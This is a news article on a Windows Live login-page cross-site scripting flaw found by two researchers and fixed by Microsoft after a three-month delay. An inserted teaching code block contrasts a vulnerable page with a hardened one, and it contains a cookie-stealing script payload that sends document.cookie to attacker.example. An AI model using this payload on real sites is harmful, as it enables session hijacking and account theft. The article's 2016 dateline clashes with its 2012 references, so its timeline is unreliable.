December 11, 2016

Microsoft fixes Windows Live identity theft flaw

(LiveHacking.Com) – Microsoft has fixed a recently discovered vulnerability in its Windows Live service that allowed an attacker to steal victims’ online identities. Abdeljalil S’hit and Yasser Aboukir reported the flaw to Microsoft after discovering that a Cross-Site Scripting (XSS) weakness let them execute a malicious script. To exploit the vulnerability, the attacker needed to trigger an error on the Windows Live login page; because of the XSS flaw, the page would then render and execute the attacker’s script along with the error.

As a result of the flaw, an attacker could impersonate a Windows Live user by gaining full control of the victim’s cookies. Combined with social engineering, for example persuading the victim to open a crafted link, this technique could be used to steal the victim’s Windows Live identity. The Microsoft Security Response Center asked the researchers not to disclose the flaw while it worked on a fix. The pair duly kept quiet and Microsoft did come up with a fix, but it took three months.
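The article does not publish the exact payload or page, so the following is an added illustration rather than Microsoft’s code or the researchers’ exploit. It models the class of bug described above: a login page that reflects an error message from the URL straight into its HTML (reflected XSS), shown beside the same page with output encoding applied, plus the HttpOnly cookie flag as defence in depth against the cookie-theft impact. The query parameter name `err`, the hostnames and the payload are all hypothetical.

```javascript
// Added illustration, not Microsoft's code: a login page that echoes an
// error message into its HTML, first unescaped (reflected XSS) and then
// with output encoding. The parameter name "err" and the hostnames are
// hypothetical and constructed for this example.

// Constructed attacker payload: exfiltrates the session cookie, which is
// the impact the article describes.
const PAYLOAD =
  "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>";

// HTML-encode the five characters that matter inside element content and
// double-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Recover the error text the page will display from the login URL,
// e.g. https://login.example/?err=Invalid+password
function errorFromUrl(url) {
  return new URL(url).searchParams.get('err') || '';
}

// Vulnerable: interpolates the error straight into the markup, so a
// crafted "err" value becomes live script in the victim's browser.
function renderLoginVulnerable(err) {
  return `<form method="post"><p class="error">${err}</p>` +
         `<input name="user"><input name="pass" type="password"></form>`;
}

// Hardened: same page, error text HTML-encoded before interpolation.
function renderLoginHardened(err) {
  return `<form method="post"><p class="error">${escapeHtml(err)}</p>` +
         `<input name="user"><input name="pass" type="password"></form>`;
}

// Crude check used below: does the rendered document contain a raw
// <script> start tag? Sufficient for this demonstration.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the cookie-theft impact: a session cookie flagged
// HttpOnly is not readable from document.cookie even if a script does run.
function sessionCookieHeader(value) {
  return `session=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Stand-alone run: build the attack URL, render both pages, compare.
const attackUrl = 'https://login.example/?err=' + encodeURIComponent(PAYLOAD);
const reflectedError = errorFromUrl(attackUrl);
console.log('vulnerable page carries live script:', containsScriptTag(renderLoginVulnerable(reflectedError)));
console.log('hardened page carries live script:  ', containsScriptTag(renderLoginHardened(reflectedError)));
console.log('Set-Cookie:', sessionCookieHeader('abc123'));
```

Output encoding at the point where untrusted text meets HTML is the actual fix for this bug class; HttpOnly only limits what a successful injection can read and does nothing to stop the script itself from running, so it is shown here as a second layer, not a substitute.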

“We have created a code change to address the issue and are now testing the changes,” a Microsoft spokesperson told the duo, according to ZDNet. “Because changes to the site may affect a large number of users, the testing requirements prior to production release are lengthy. Based on the testing schedule and barring any significant regressions, the team expects to release an update into production in early May.”

Abdeljalil S’hit and Yasser Aboukir are to be applauded for the way they disclosed the issue, but questions remain over Microsoft’s delay in addressing the problem. To Microsoft’s credit, however, it did feature the pair on its list of June 2012 Security Researchers for their proper disclosure.